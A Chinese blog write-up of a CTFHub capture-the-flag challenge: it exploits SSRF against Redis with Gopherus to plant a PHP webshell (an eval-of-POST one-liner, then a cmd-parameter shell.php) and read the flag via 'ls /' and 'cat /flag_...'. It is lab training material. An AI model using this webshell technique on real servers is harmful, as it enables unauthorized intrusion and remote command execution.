CTFHUB-SSRF-Redis协议

燕雀安知鸿鹄之志哉.

已于 2024-07-29 20:22:58 修改

阅读量326

点赞数 12

分类专栏： CTFHUB技能树文章标签： redis 数据库缓存网络安全经验分享

于 2024-07-03 08:30:00 首次发布

本文链接：https://blog.csdn.net/weixin_68416970/article/details/140098921

版权

CTFHUB技能树专栏收录该内容

66 篇文章 0 订阅

订阅专栏

本题需要用到：

在线编码网址：https://icyberchef.com/

gopherus工具链接: Gopherus工具的下载、使用-CSDN博客

开启题目，页面空白

和上一个题FastCGI协议一样，还是使用gopherus攻击redis

./gopherus.py --exploit redis
第二行默认是/var/www/html，可以不输直接回车
<?php eval($_post["123"]);?>

得到了这些，发现已经自动把%0a转换成%0d%0a了，我们对他二次编码

编码后的这一串放进url访问，等了很久，他返回504超时了，但是应该传上去了，使用蚁剑连接，位置是shell.php，使用蚁剑连接没有连上去，不知道为什么，那就换一种方法

回到刚才第一步，除了第一步选择PHPShell，其他都默认，默认文件名为shell.php，默认命令参数是cmd

得到了编码，对它再进行一次编码

放入url访问，等了很久还是返回504

访问shell.php成功了 ,url写入

shell.php/?cmd=ls /

看到了flag，cat读取flag，就得到了我们需要的flag

shell.php/?cmd=cat /flag_b22135bb6e61395d1e90b103e7cf760f

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

燕雀安知鸿鹄之志哉.

关注关注

12
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
CTFHUB-SSRF-Redis协议

CTFHUB技能树、SSRF、Redis协议的通关教程
复制链接

扫一扫

专栏目录

CTFHUB技能树-SSRF-redis协议踩坑

u011250160的博客

01-03

570

在gopherus上面输入命令：python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。

Python-GitLab1147SSRF配合redis远程执行代码

08-10

GitLab 11.4.7 SSRF配合redis远程执行代码

参与评论您还未登录，请先登录后发表或查看评论

ctfhub--ssrf

qq_44418229的博客

06-10

1016

ctfhub----ssrf笔记

CTFHUB--SSRF（中）--FastCGI协议\Redis协议以及gopherus工具攻击

qq_75120258的博客

03-29

2335

本来我们可以执行任意文件，但是在FPM某个版本之后，增加了security.limit_extensions选项，限定了只有某些后缀的文件允许被fpm执行，默认是.php，所以现在要使用这个漏洞，我们得先知道服务器上的一个php文件，假设我们爆破不出来目标环境的web目录，我们可以找找默认源安装后可能存在的php文件，比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI，它在服务器启动的时候先启动一个应用程序池，然后由这个应用程序池来管理和调度应用程序的执行。

CTFHub--＞web--＞ssrf--＞Redis协议

unlash的博客

09-20

502

CTFHub redis获取flag步骤详解 redis协议 gopherus.py

CTFHub-SSRF（全部）

1stPeak's Blog

08-01

2932

文章目录内网访问伪协议读取文件端口扫描POST请求内网访问解题步骤伪协议读取文件解题步骤端口扫描提示：根据提示对目标端口进行爆破注：使用字典也可以，用for循环写一个字典出来，还有就是爆破时线程不能太高，太高容易失败，无法爆出来 POST请求注：中途靶机重启过一次，网址有些改变，不要在意，看payload即可解题步骤根据网上的一些内容，他共有3个php文件，分别是flag.php、302.php、index.php http://challenge-d01e92

CTFHUB--SSRF详解

qq_49422880的博客

05-23

6514

SSRF详解SSRF漏洞介绍一、（内网访问、伪协议利用）1.1内网访问1.2伪协议读取文件1.3端口扫描二、（POST 上传文件 FastCGI协议 Redis协议）2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、（Bypass系列）3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍 SSRT(Server-Side Request Forgery，服务器端请求伪造)，就

CTFHub-Web-SSRF

IceCream的博客

04-29

1919

1.题目提示说访问127.0.0.1的flag.php，在URL后面添加路径没想到直接访问成功。

CTFHub-ssrf（1）

m0_62706061的博客

11-07

257

ctfhub-ssrf初识

CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!

2401_85783544的博客

07-24

1006

1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议，主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。

通过SSRF操作Redis主从复制写Webshell_R3start1

08-03

1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存

uptime-checks-ssrf

04-06

这是视频，介绍在那里发现的31,000美元盲SSRF的理论：该实验室只是一个模拟，它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。有一个公开的服务可以模拟GCP控制台的“正常运行...

开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip

04-09

SSRF（Server-Side Request Forgery）前端挡光元件设计中的力学问题研究主要涉及软件开发与硬件工程的交叉领域，特别是在网络安全和机械结构设计方面。SSRF是一种利用服务器发起请求的安全漏洞，通常针对的是服务器...

开发技术-硬件-SSRF前端挡光元件设计中的若干力学问.zip

04-09

开发技术-硬件

【速览】Redis（更新中）

椰子的职场成长记录

08-20

508

Redis 支持多种数据结构，如字符串（strings）、哈希（hashes）、列表（lists）、集合（sets）、有序集合（sorted sets）等。持久化：Redis 支持两种持久化方式，RDB（快照）和 AOF（追加文件），以确保数据在重启后不会丢失。原子操作：Redis 的所有操作都是原子的，这使得它非常适合于需要高并发和数据一致性的场景。Lua 脚本：Redis 支持在服务器端执行 Lua 脚本，可以用于实现复杂的业务逻辑。事务支持：Redis 支持事务，可以将多个命令打包在一起执行。

Java如何使用 Redis 实现分布式锁